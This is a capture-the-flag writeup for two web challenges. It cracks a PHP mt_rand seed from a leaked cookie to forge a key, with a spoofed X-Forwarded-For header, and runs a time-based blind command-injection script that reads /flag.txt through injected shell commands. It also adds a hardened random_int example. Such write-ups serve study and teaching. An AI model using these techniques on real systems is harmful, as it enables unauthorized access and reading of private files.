2020-08-28
“钓鱼城杯” International Cyber Security Skills Competition Writeup
easyseed
index.bak:
```php
<?php
// Both cookie values are derived from mt_rand(), a seeded Mersenne Twister,
// so the 6-character $lock leaks enough output to recover the seed and the $key.
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key  = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for ($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
```
Brute-force the mt_rand() seed with php_mt_seed.
Generate the php_mt_seed arguments with a script (each character of the known $lock cookie gives one mt_rand(0, 51) output):
```python
# Alphabet used for $lock (note the typo-ridden alphabet from index.bak: it has
# 52 characters, so mt_rand was called as mt_rand(0, 51)).
str1 = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
# The leaked $lock cookie value.
str2 = 'vEUHaY'
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # php_mt_seed syntax: "min max rmin rmax" per output, i.e. the
            # output was exactly j and was produced by mt_rand(0, 51).
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)
```
Brute-force the seed.
Then regenerate the key value with the recovered seed:
```php
<?php
// Seed recovered by php_mt_seed; re-seeding replays the same mt_rand() stream.
mt_srand(718225);
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key  = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
echo $lock . PHP_EOL;
echo $key;

function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for ($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
```
Send the payload:
```python
import requests

url = 'http://122.112.252.28:20001/'
# The $lock seen in the original response and the $key regenerated from the seed.
cookies = {'key': 'nRtqGR8mtd9ZOPyI', 'lock': 'vEUHaY'}
headers = {'X-Forwarded-For': '127.0.0.1'}
res = requests.get(url=url, cookies=cookies, headers=headers)
print(res.text)
```
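As an added example that is not part of the writeup: the challenge's random() next to a hardened version that uses random_int(), with the same alphabets and lengths as index.bak and the seed recovered above. The exact mt_rand() values for a seed depend on the PHP version (7.1 changed the implementation), so the strings may differ from the writeup's on another version, but the replayability shown here does not.

```php
<?php
// Added example, not code from the writeup. Same alphabets and lengths as index.bak.

// Weak: mt_rand() is a Mersenne Twister whose whole output stream is fixed by a
// 32-bit seed. Exposing 6 outputs as the $lock cookie is enough to recover that
// seed, after which the 16-character $key is simply the next 16 outputs.
function random_weak($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for ($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

// Hardened: random_int() reads from the OS CSPRNG. There is no seed to brute
// force and earlier outputs reveal nothing about later ones.
function random_strong($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for ($i = 0; $i < $length; $i++) {
        $hash .= $chars[random_int(0, $max)];
    }
    return $hash;
}

$lockChars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
$keyChars  = '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';

// Re-seeding with the recovered seed reproduces lock and key exactly; this
// determinism is what the seed brute force relies on.
mt_srand(718225);
$lock1 = random_weak(6, $lockChars);
$key1  = random_weak(16, $keyChars);
mt_srand(718225);
$lock2 = random_weak(6, $lockChars);
$key2  = random_weak(16, $keyChars);
echo 'mt_rand replayable: ', var_export($lock1 === $lock2 && $key1 === $key2, true), PHP_EOL;

// The hardened generator has nothing to re-seed, so two draws are independent.
$lockA = random_strong(6, $lockChars);
$lockB = random_strong(6, $lockChars);
echo 'random_int replayable: ', var_export($lockA === $lockB, true), PHP_EOL;
```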
easyweb
Capture the request.
The command executes but returns no output, so extract the flag with a time-based blind approach.
```python
import requests
from time import time

url = 'http://119.3.37.185/'
# One character of /flag.txt per request: sleep 2 seconds when the guess is right.
payload = 'if [ `cut -c {num1} /flag.txt` = "{num2}" ];then sleep 2;fi'
flag = ''
# cut -c positions start at 1, not 0.
for i in range(1, 400):
    for j in range(32, 127):
        data = {'cmd': payload.format(num1=str(i), num2=chr(j))}
        start_time = time()
        requests.post(url, data=data)
        # A response delayed by the sleep means this character matched.
        if time() - start_time > 2:
            flag += chr(j)
            print(flag)
            if chr(j) == '}':
                exit()
            break
```